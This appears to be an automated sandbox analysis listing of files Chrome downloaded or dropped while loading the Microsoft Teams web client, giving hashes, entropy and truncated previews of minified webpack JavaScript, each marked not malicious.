                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[941359],{941359:(a,l,Z)=>{Z.d(l,{fSE:()=>h,TP9:()=>m,LSe:()=>e,v9w:()=>v,y2B:()=>M,cbT:()=>H,zb1:()=>V,nY7:()=>A,SXh:()=>i,Qi2:()=>L,xkB:()=>U,xHU:()=>r,wDt:()=>d,GqH:()=>g,ma3:()=>u,yKV:()=>t,EAE:()=>o,wIE:()=>F,F8W:()=>n,n_S:()=>R,ba$:()=>C,dMU:()=>s,ILi:()=>f,chi:()=>b,Aig:()=>p,EEN:()=>I,MLu:()=>O,mUJ:()=>k,xG7:()=>G,bio:()=>S,l8b:()=>N,B7m:()=>z,EMy:()=>E,kOy:()=>_,nYd:()=>w,bL$:()=>y,Q_I:()=>B,IMc:()=>D,OJr:()=>K,ipe:()=>P,h19:()=>T,XN6:()=>x,BYz:()=>Q,Bj:()=>Y,$RO:()=>X,Ftl:()=>j,fbj:()=>q,nKf:()=>J,TkK:()=>$,pO8:()=>W,Lin:()=>aa,nT:()=>la,oCE:()=>Za,K$r:()=>ca,M1Y:()=>ha,O0v:()=>ma,SH1:()=>ea,AqR:()=>va,Hzn:()=>Ma,t1F:()=>Ha,SrQ:()=>Va,a3S:()=>Aa,_Vr:()=>ia,QQo:()=>La,BBu:()=>Ua,Bul:()=>ra,uk7:()=>da,YFz:()=>ga,$jj:()=>ua,$4h:()=>ta,PHn:()=>oa,z4P:()=>Fa,N_H:()=>na,BFD:()=>Ra,YXI:()=>Ca,gTi:()=>sa,spK:()=>fa,wJr:()=>ba,sNG:()=>pa,gZ8:()=>Ia,B8A:()=>Oa,pLc:()=>ka,r43:(
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65513), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):448430
                                                                                                                                                                                                                                                                            Entropy (8bit):4.73954070512095
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:6144:AB/qzit4k1ed2fgkfbJW7RyvUxpXcTylqfSlX1:ABSjkfbZLg
                                                                                                                                                                                                                                                                            MD5:EA2F3E56C305A4A1E8D998D452F1FD40
                                                                                                                                                                                                                                                                            SHA1:91C9A8E2BBEE6D908D3E55FE6C22BABE6863C654
                                                                                                                                                                                                                                                                            SHA-256:28D37F91A8D7ADD041F3F6C6178A770FA9F13FF463B701F38B951EA701E81B07
                                                                                                                                                                                                                                                                            SHA-512:6D9E20F5A30F1A104D116AE0B5DC8CC3BE32E417C9286D78966A387BCC75CE384AD1CD7020209643EA4F95268B3FBE1D9A7F83218832CC5ABCFCA98C8EFC1A64
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[413749],{114623:(e,t,a)=>{a.r(t),a.d(t,{default:()=>i});const i={namespace:"calling",locale:"en-us",translations:{aa_permission_error_header_description:"You are no longer authorized for this auto attendant",acccepted_elsewhere_call_timeline_description_label:"Answered by {{acceptedElsewhereParticipantName}}",active_in_call_with:"is in call with {{caller}}",activity_date_today:"Today",add_a_room_close_button:"Close",add_a_room_enable_bluetooth_subtitle:"Turn on Bluetooth to automatically detect nearby rooms.",add_a_room_no_rooms_text:"Didn't find any Teams rooms nearby",add_a_room_other_suggestions:"Other Suggestions",add_a_room_screen_title:"Nearby Rooms",add_a_room_searching_text:"Searching for nearby Teams Rooms...",add_a_room_title:"Add a room",add_address:"Add",add_address_aria_label:"Add location",add_emergency_address:"Add",add_menu_option:"Add new option",add_new_addr
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (33266)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):33374
                                                                                                                                                                                                                                                                            Entropy (8bit):5.170268480848515
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:JkQajjwCbtihMF2vwh8R5VOdJXLIgqx6fj0K:J9h/vwhOWcgq+R
                                                                                                                                                                                                                                                                            MD5:40832E67D4391FFDB1613F7DB5F33076
                                                                                                                                                                                                                                                                            SHA1:70382211316199F58BC0D3D56C2A98C81849E11D
                                                                                                                                                                                                                                                                            SHA-256:9A525A37F6D2471F7E74B15172D469DAA14C47096827395DDEB769BFE2E4590A
                                                                                                                                                                                                                                                                            SHA-512:707F2BE3C1177E85036AD8163ADA6FBC33F000F83AE80F6F80A5D32D8FB787CE51C6EB129D0541D6D3C2BE7C277985C380A8EDF4B1AD67061019CE266E917FE4
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[337355],{327402:function(t,r){var e,n,o;n=[],void 0===(o="function"==typeof(e=function(){var t=/^v?(?:\d+)(\.(?:[x*]|\d+)(\.(?:[x*]|\d+)(\.(?:[x*]|\d+))?(?:-[\da-z\-]+(?:\.[\da-z\-]+)*)?(?:\+[\da-z\-]+(?:\.[\da-z\-]+)*)?)?)?$/i;function r(t,r){return-1===t.indexOf(r)?t.length:t.indexOf(r)}function e(t){var e=t.replace(/^v/,"").replace(/\+.*$/,""),n=r(e,"-"),o=e.substring(0,n).split(".");return o.push(e.substring(n+1)),o}function n(t){return isNaN(Number(t))?t:Number(t)}function o(r){if("string"!=typeof r)throw new TypeError("Invalid argument expected string");if(!t.test(r))throw new Error("Invalid argument not valid semver ('"+r+"' received)")}function i(t,r){[t,r].forEach(o);for(var i=e(t),s=e(r),c=0;c<Math.max(i.length-1,s.length-1);c++){var u=parseInt(i[c]||0,10),a=parseInt(s[c]||0,10);if(u>a)return 1;if(a>u)return-1}var f=i[i.length-1],l=s[s.length-1];if(f&&l){var p=f.split(".").map(n
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (64207)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):64315
                                                                                                                                                                                                                                                                            Entropy (8bit):5.843899859389002
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:mMFI/82Yes6+uUkL4hKKlOifhZ2M/FBl7GzoFY3T2S:RWBUkL4hTOif3pfl7fFYN
                                                                                                                                                                                                                                                                            MD5:FF77D9414B022CD2C1FC04445A615486
                                                                                                                                                                                                                                                                            SHA1:907876E4E342B9ED7629CEC7964669B8F17F5446
                                                                                                                                                                                                                                                                            SHA-256:279F0B1BBFDF404CBFADCBFA76104D2BC3C35DC3E863529A6CDA3340E00F33B6
                                                                                                                                                                                                                                                                            SHA-512:E05C0755BD3D245A8068B785C7B5F22D022BCF9B709DE5B8F579CF03E19AF0518EB85C5549EC0F75ADCCCE6781633749963703AC4869B596F98E0C607D52040A
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[891386],{552211:(M,N,D)=>{"use strict";D.d(N,{x2:()=>i,ZI:()=>T,jC:()=>u,ri:()=>z,Xn:()=>c,xA:()=>e,O0:()=>t});var j=D(440320),I=D(848020);const i={...{"data-track-action-gesture":j.Od.click,"data-track-action-scenario-type":j.DB.appAuth,"data-track-module-type":j.nR.link,"data-track-panel-region":j.rP.main,"data-track-action-subworkload":j.i7.sisu,"data-track-action-workload":j.E0.auth,"data-track":!0},"data-track-action-outcome":j.nd.openInBrowser,"data-track-action-scenario":j.vB.authUseWorkAccountLink,"data-track-module-name":j.Sn.getTeamsForWorkOrSchool,"data-track-panel-type":j.HP.AuthAccountEnumerationMenu};function g(M){return{"data-track-action-gesture":j.Od.click,"data-track-action-scenario-type":j.DB.appAuth,"data-track-action-subworkload":j.i7.signout,"data-track-action-workload":j.E0.auth,"data-track-module-type":j.nR.button,"data-track-panel-region":j.rP.modal,"data-track-pa
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):316178
                                                                                                                                                                                                                                                                            Entropy (8bit):5.268366494766045
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:6144:Db8wBO1kp38IFhC125W3Ql3yn5HSPF7Hn3Wio6:DbAah+25W3EGeXWin
                                                                                                                                                                                                                                                                            MD5:4413BB373CA8F32D729254F56B617F93
                                                                                                                                                                                                                                                                            SHA1:FA3404FE39D04813B4022652A5B23A22629876FA
                                                                                                                                                                                                                                                                            SHA-256:9E8084D6663E02AFA00EBCDB426632F12750A2BA4F500C169484E1EF73F01AE7
                                                                                                                                                                                                                                                                            SHA-512:BE7D0D228EC268E8418933E5D7C8620C90F9BB7105949E836CF112AF7910C92F792411C4134E4607364C9B03F119AE4EC7085DFB2202BBB11DF2EB3B74BA5FC8
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/865969-5f963a9d50c28fb0.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[865969],{407845:(e,t,r)=>{r.d(t,{vq:()=>c,Ji:()=>d,q8:()=>l});var n=r(514181),o=r(538906),i=r(145353),a=r(789389),s=r(543678);class c{static async createPublicClientApplication(e){const t=await(0,n.K)(e);return new c(e,t)}constructor(e,t){this.controller=t||new o.i(new i.A(e))}async initialize(e){return this.controller.initialize(e)}async acquireTokenPopup(e){return this.controller.acquireTokenPopup(e)}acquireTokenRedirect(e){return this.controller.acquireTokenRedirect(e)}acquireTokenSilent(e){return this.controller.acquireTokenSilent(e)}acquireTokenByCode(e){return this.controller.acquireTokenByCode(e)}addEventCallback(e){return this.controller.addEventCallback(e)}removeEventCallback(e){return this.controller.removeEventCallback(e)}addPerformanceCallback(e){return this.controller.addPerformanceCallback(e)}removePerformanceCallback(e){return this.controller.removePerformanceC
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (56687)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):56795
                                                                                                                                                                                                                                                                            Entropy (8bit):4.496605446110163
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:QdNHz8zyV/Vt8aHqMYqbB9OgCumyac8HD95pHX1ufXF/ShSD2QLEmccca+ENvHE2:Qd5V/VFjYgCHyac855p31uUujr1
                                                                                                                                                                                                                                                                            MD5:DD7482008E840BA334E2F9BE103CC648
                                                                                                                                                                                                                                                                            SHA1:1163A175C569AC0EC75255AB4E4F9D0D75F7B6EB
                                                                                                                                                                                                                                                                            SHA-256:DFBCCC584F4CC241D4B8C7BB982AA1654D24B885150868E661D2611E1D94056E
                                                                                                                                                                                                                                                                            SHA-512:2E539CE02213EBE808720D56F0EE7662D0BCF3B06B9321393B65A3A19D9EF661A812BBCB7AF6B5AE9083E64C89243ABC09416AAD6C6051FB3C7A44B1E9D6AF67
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[750818],{750818:(a,l,Z)=>{Z.d(l,{_jO:()=>e,iNx:()=>m,gcm:()=>v,_Xk:()=>h,IjV:()=>M,Ylq:()=>H,W_M:()=>r,yuG:()=>i,NGN:()=>V,nUb:()=>o,oAB:()=>U,Crl:()=>C,tyz:()=>A,LKJ:()=>t,xeZ:()=>L,dbj:()=>d,Cke:()=>n,aUo:()=>u,dgX:()=>s,lr5:()=>g,k$2:()=>R,m_5:()=>F,BKw:()=>D,Njq:()=>p,QWN:()=>k,CX7:()=>f,V6R:()=>w,Xwn:()=>E,nvQ:()=>y,XUe:()=>S,c4C:()=>b,yly:()=>j,_B:()=>_,wSM:()=>O,onv:()=>x,iG:()=>B,nrH:()=>W,J3O:()=>Q,qQV:()=>T,ALn:()=>q,$HY:()=>z,ZJc:()=>N,MVw:()=>P,akU:()=>X,WhM:()=>G,CbY:()=>$,WHO:()=>I,k_r:()=>J,POZ:()=>K,Lpw:()=>Y,OGg:()=>aa,O6n:()=>la,pQD:()=>Za,jsk:()=>ca,FT3:()=>ea,Htf:()=>ma,xhg:()=>va,d_C:()=>ha,f8w:()=>Ma,pwR:()=>Ha,Enj:()=>ra,Qvr:()=>ia,zBW:()=>Va,LWr:()=>oa,d0y:()=>Ua,cBQ:()=>Ca,Ult:()=>Aa,pyq:()=>ta,smH:()=>La,Gdy:()=>da,f0V:()=>na,VEF:()=>ua,yus:()=>sa,IN0:()=>ga,olq:()=>Ra,W6w:()=>Fa,Sz$:()=>Da,y7H:()=>pa,p$u:()=>ka,ntX:()=>fa,DxS:()=>wa,Hi:()=>Ea,Y6r:()
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (22028)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):22136
                                                                                                                                                                                                                                                                            Entropy (8bit):5.408588929590394
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:B3NqcNsJobwv8blMDkuYMBYcTjlXH8P2WOhCOdf1D71yF7Ju0bTul3cE+w4Ry7Eq:VE4VUv8RMD9YMBYcnlXH8P2WOhCOdf1P
                                                                                                                                                                                                                                                                            MD5:A87E1F75E1BF072B58ED22C7F8DB87A7
                                                                                                                                                                                                                                                                            SHA1:C4FDB0BA7198411E7510008AD2E812F3BB68D462
                                                                                                                                                                                                                                                                            SHA-256:1DC0883980E666CFDB588463571ECC238B750ADD14372B967A18E2C427DAB9F1
                                                                                                                                                                                                                                                                            SHA-512:64CD0292C77ADBDF95568D680F0DCC9B429A30553F6678ACD487D09C63C8E609FE3A043FFDFADD77BD41382D474B3186A57B2009919F7F6A3F1702805A2F4622
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[816410],{816410:function(e){e.exports=function(){"use strict";const{entries:e,setPrototypeOf:t,isFrozen:n,getPrototypeOf:o,getOwnPropertyDescriptor:r}=Object;let{freeze:i,seal:a,create:l}=Object,{apply:c,construct:s}="undefined"!=typeof Reflect&&Reflect;i||(i=function(e){return e}),a||(a=function(e){return e}),c||(c=function(e,t,n){return e.apply(t,n)}),s||(s=function(e,t){return new e(...t)});const u=b(Array.prototype.forEach),m=b(Array.prototype.pop),p=b(Array.prototype.push),f=b(String.prototype.toLowerCase),d=b(String.prototype.toString),h=b(String.prototype.match),g=b(String.prototype.replace),_=b(String.prototype.indexOf),T=b(String.prototype.trim),y=b(Object.prototype.hasOwnProperty),E=b(RegExp.prototype.test),A=S(TypeError);function N(e){return"number"==typeof e&&isNaN(e)}function b(e){return function(t){for(var n=arguments.length,o=new Array(n>1?n-1:0),r=1;r<n;r++)o[r-1]=argument
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (8001)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):8108
                                                                                                                                                                                                                                                                            Entropy (8bit):4.549545678850894
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:o9gbac64rkT+oSl1mRU1Wgcugcrj1SELqaQ6KrEY:o9vUoQoiPIEdQ6Ol
                                                                                                                                                                                                                                                                            MD5:287A004D080AF3408A3F25E336576729
                                                                                                                                                                                                                                                                            SHA1:BAD3E0268D7A0F8C1F10961BBADE39446A378924
                                                                                                                                                                                                                                                                            SHA-256:0708C60B65649BA3BB61A0BFEC4F52984B04E2C7EF1AAAA533E063EBECD5D317
                                                                                                                                                                                                                                                                            SHA-512:937DE395C8E3F0D5EEF955BA184361DD5AFD2E79B0A5060BCA9FAD28BD1EB63F011FB3B26361F71221117B7BB5C5681B2C70EAC7F3D2F2975D86A07CB6150A1E
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[27001],{27001:(a,l,c)=>{c.d(l,{XfG:()=>Z,gYT:()=>v,Kug:()=>r,OO7:()=>e,bNk:()=>M,aHF:()=>A,ugD:()=>t,spB:()=>m,WG1:()=>V,IQ:()=>o,SNF:()=>U,VM4:()=>i,FvG:()=>H,T1Y:()=>u,FPz:()=>L,pTW:()=>s,Ncu:()=>k,H3l:()=>R,mk2:()=>g,_OX:()=>p});var h=c(693935);const Z=(0,h.U)("ArrowReset20Regular","20",["M5.85 2.65c.2.2.2.5 0 .7L4.21 5H11a6 6 0 1 1-6 6 .5.5 0 0 1 1 0 5 5 0 1 0 5-5H4.2l1.65 1.65a.5.5 0 1 1-.7.7l-2.5-2.5a.5.5 0 0 1 0-.7l2.5-2.5c.2-.2.5-.2.7 0Z"],{flipInRtl:!0}),v=(0,h.U)("ArrowRight24Filled","24",["M13.7 4.28a1 1 0 1 0-1.4 1.43L17.67 11H4a1 1 0 1 0 0 2h13.66l-5.36 5.28a1 1 0 0 0 1.4 1.43l6.93-6.82c.5-.5.5-1.3 0-1.78L13.7 4.28Z"]),r=(0,h.U)("ArrowSort20Filled","20",["M14.84 16.72a.76.76 0 0 1-.59.28.73.73 0 0 1-.53-.22l-3-3a.75.75 0 0 1 1.06-1.07l1.72 1.73V3.75a.75.75 0 0 1 1.5 0v10.68l1.72-1.71a.75.75 0 1 1 1.06 1.06l-2.94 2.94ZM6.34 3.28A.76.76 0 0 0 5.75 3c-.2 0-.38.07-.5
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (9414)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):9522
                                                                                                                                                                                                                                                                            Entropy (8bit):4.450515488425317
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:bmWQhC/9a/SV5Kdgcy6E4tFO1R9QJjseVtrTeGoPxG/0VVi9KE:bQC8KVUC4CQaeVtHoPk/0VViYE
                                                                                                                                                                                                                                                                            MD5:D3534574FC74BF606194A4B77757838A
                                                                                                                                                                                                                                                                            SHA1:21F552D18370063B69051D642D90F6D4097FBF74
                                                                                                                                                                                                                                                                            SHA-256:FA8E7CB8075B8EFDD28D1B3D7B6430111C1B862532809F21931C9ADB44D0B531
                                                                                                                                                                                                                                                                            SHA-512:C9A98E263DB8215D3B1EC7FA2B3BDFF9807CD5AEF1B74DBAB6322B4E689EDE435DB24772005E2CC9AE85BAEFA5E8AF4A39B6EE21B3CA7E59AD2B3C7C563D4607
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[166017],{166017:(a,l,c)=>{c.d(l,{Dgf:()=>Z,zLX:()=>e,BTT:()=>M,hSs:()=>v,hD3:()=>m,HNj:()=>r,to8:()=>o,GNZ:()=>H,caz:()=>i,eFq:()=>n,i1Y:()=>V,OMj:()=>u,Mxb:()=>t,wHO:()=>U,CA_:()=>s,WGQ:()=>A,k7A:()=>L,oaK:()=>g,swq:()=>d,qVy:()=>R,KCZ:()=>C});var h=c(693935);const Z=(0,h.U)("Megaphone20Filled","20",["M16.11 3.35A1.5 1.5 0 0 1 18 4.8v10.31c0 1.03-1 1.75-1.97 1.43l-4.76-1.59A3.25 3.25 0 0 1 5 13.75v-.89l-1.97-.66A1.5 1.5 0 0 1 2 10.78V8.27c0-.68.46-1.28 1.11-1.45l13-3.47ZM6 13.2v.56a2.25 2.25 0 0 0 4.32.88L6 13.2Z"]),e=(0,h.U)("Megaphone20Regular","20",["M18 4.8c0-.98-.93-1.7-1.89-1.45l-13 3.47A1.5 1.5 0 0 0 2 8.27v2.5c0 .65.41 1.23 1.03 1.43l1.97.66v.89a3.25 3.25 0 0 0 6.27 1.2l4.76 1.59A1.5 1.5 0 0 0 18 15.1V4.81Zm-7.68 9.83A2.25 2.25 0 0 1 6 13.75v-.56l4.32 1.44Zm6.05-10.31a.5.5 0 0 1 .63.48v10.31a.5.5 0 0 1-.66.48l-13-4.34a.5.5 0 0 1-.34-.47V8.27a.5.5 0 0 1 .37-.48l13-3.4
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):106801
                                                                                                                                                                                                                                                                            Entropy (8bit):5.382849210836161
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:Vn8xnFvCQG3wq7g1Ctzg+ohY5dtiyxIDQrdbCJHoNXxYsAZ0LiyxIDQ9nl6/BjQP:Vn8xnFvZGxgYNfPTIiLPTstKjLT+xNs
                                                                                                                                                                                                                                                                            MD5:A6016E13434CA478163FCBFE67A5E2C8
                                                                                                                                                                                                                                                                            SHA1:2D757616159C21EFD21D81A8A640DE69E7772D7C
                                                                                                                                                                                                                                                                            SHA-256:543396C48663471C8D283F2EC6A0C8CE694150E83B36745708A2A8FDE7088E3E
                                                                                                                                                                                                                                                                            SHA-512:16FB08CE8FD12A5567258EE77A2D42B90578816B52FD7763BA6BB447489214FAFFF60BFD4400D519C966008AC136A67BD5385CD92EC2AD3CF67B88A3F4F36BA0
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/151748-7ed0b00a4edf9dcd.js?ts=1733248843644
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[151748],{402986:(e,n,t)=>{"use strict";t.d(n,{A:()=>r});var a=t(246361);const r=t.n(a)()},7883:(e,n,t)=>{"use strict";function a(e){const n=e.regex,t={},a={begin:/\$\{/,end:/\}/,contains:["self",{begin:/:-/,contains:[t]}]};Object.assign(t,{className:"variable",variants:[{begin:n.concat(/\$[\w\d#@][\w\d_]*/,"(?![\\w\\d])(?![$])")},a]});const r={className:"subst",begin:/\$\(/,end:/\)/,contains:[e.BACKSLASH_ESCAPE]},i={begin:/<<-?\s*(?=\w+)/,starts:{contains:[e.END_SAME_AS_BEGIN({begin:/(\w+)/,end:/(\w+)/,className:"string"})]}},s={className:"string",begin:/"/,end:/"/,contains:[e.BACKSLASH_ESCAPE,t,r]};r.contains.push(s);const o={begin:/\$?\(\(/,end:/\)\)/,contains:[{begin:/\d+#[0-9a-f]+/,className:"number"},e.NUMBER_MODE,t]},c=e.SHEBANG({binary:`(${["fish","bash","zsh","sh","csh","ksh","tcsh","dash","scsh"].join("|")})`,relevance:10}),l={className:"function",begin:/\w[\w\d_]*\s*\(\s*\)\s*\{
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (12648), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):12648
                                                                                                                                                                                                                                                                            Entropy (8bit):5.331618680016599
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:UBvT91sirzk6r/Ta1sirzogFXhFh76cQJ:UBvT3To6jqTkgFXhFh76cQJ
                                                                                                                                                                                                                                                                            MD5:B3688EB03DF81642144495322F067B41
                                                                                                                                                                                                                                                                            SHA1:B1A0AB57D487B8D2F6C6883204DDAD50D74121A9
                                                                                                                                                                                                                                                                            SHA-256:6FE9A5B6A3BB2C20937E96B04EDE350E39C6AEC365BE5DEA991C8AEFE235B9C8
                                                                                                                                                                                                                                                                            SHA-512:C0D86423670A2D99785609EE5A93C59A7384C16751840BC7D7E0A84A9F1CAB4116AB889CA7842456D308443A5650CC855B845C347D472FA07AE250BBAD6C9743
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/batched-remoteEntry-fc09dbd144865a71c3e5.js?cb=1733248788948
                                                                                                                                                                                                                                                                            Preview:"use strict";var sidecarDiagnostics,sidecarChatZeroState,sidecarMeetApp,sidecarTflOnboarding,sidecarUserContext,sidecarI18nContext,sidecarHtmlSanitizerContext,sidecarAriaLiveContext,sidecarFocusManagementContext;(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[150699],{564961:(e,t,r)=>{var i={".":()=>Promise.all([r.e(587200),r.e(918681),r.e(215111),r.e(750818),r.e(978582),r.e(756854),r.e(769268),r.e(70674),r.e(367927),r.e(268921),r.e(842549),r.e(459628),r.e(664062),r.e(994444),r.e(35871)]).then((()=>()=>r(431810)))},n=(e,t)=>(r.R=t,t=r.o(i,e)?i[e]():Promise.resolve().then((()=>{throw new Error('Module "'+e+'" does not exist in container.')})),r.R=void 0,t),a=(e,t,i)=>{if(i&&(r.tu=i),r.S){var n="default",a=r.S[n];if(a&&a!==e)throw new Error("Container initialization failed as it has already been initialized with a different share scope");return r.S[n]=e,r.I(n,t)}};r.d(t,{get:()=>n,init:()=>a})}},e=>{e.O(0,[921072],(()=>(564961,e(e.s=5649
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (21454)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):21562
                                                                                                                                                                                                                                                                            Entropy (8bit):5.424010842422398
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:7BoFIRCwFqM/rQ5DTfZTri6i4YubScRBCFFok2wdZdxG75zEB1x9I40f/H2Yhgun:7BhRCmx/rQ5DTfZT44YubScSFFokTG7J
                                                                                                                                                                                                                                                                            MD5:1751D27DC4FAD84D22D1253C96D5D481
                                                                                                                                                                                                                                                                            SHA1:470F9278EF64F1B63803A529E88E5949465BE894
                                                                                                                                                                                                                                                                            SHA-256:8D1A40C557DF1C83825E226A2294E281D68E6EC539BC4B4AF4F274D1F12C1266
                                                                                                                                                                                                                                                                            SHA-512:6761EFB44EFE1974B7C88E80C12E6EFCA4147B59447B7BDC947E31D1149A816AC893C28333292966617ABD27336983662EA8E76DFF590C76F9EFF05E0ADD84C4
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/789291-5261394304c4b6e2.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[789291],{289712:(e,t,n)=>{n.d(t,{b:()=>u});var a=n(362328),r=n(300474),i=n(930722),s=n(466548),o=n(441065),l=n(40341);const u={kind:"Document",get definitions(){const e=(0,a.G)("fragment DataFragmentsCommonChatFragment on Conversation {id,title,shortTitle,creator,tenantId,picture,guardianChatInfo,isBotBlocked,isOneOnOne,isOneOnOneBotChat,isDisabled,isMuted,lastMessage {id,...DataFragmentsCommonChatListItemLastMessageFragment},...DataFragmentsCommonChatListItemLastUpdateFragment @include(if:$includeLastUpdate),lastContentMessageTime,memberCount,me {...userFields},membersLimited {...userFields},hasTflSmsUser,hasFederatedUser,hasTflSmsVerifiedUser,hasTflConsumerUser,cfet,hasTypingUsers,chatHistoryHiddenTime,clearHistoryTime,interopConversationStatus,tflOffNetworkUser {...userFields},tflOffNetworkUserLength,isUserMember,userConsumptionHorizon {...consumptionHorizonBookmarkFields}
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (14683)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):14791
                                                                                                                                                                                                                                                                            Entropy (8bit):5.266981559868186
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:2q6vWeIhioM4yCAYegeKm8hMSscOqNEyUrz4zFq78svf:9rhkCzHzm8+SscOIcrz4z478sX
                                                                                                                                                                                                                                                                            MD5:2E0776EBD7D4B5D9BD0F3EA70A26ED97
                                                                                                                                                                                                                                                                            SHA1:B42030D90141DA576EBAC49F964DF2EE906CC45E
                                                                                                                                                                                                                                                                            SHA-256:86DC234E21FBDD307DC021937F9DFCB43C092DE11E6D9C8122C29CA7F2B86E0B
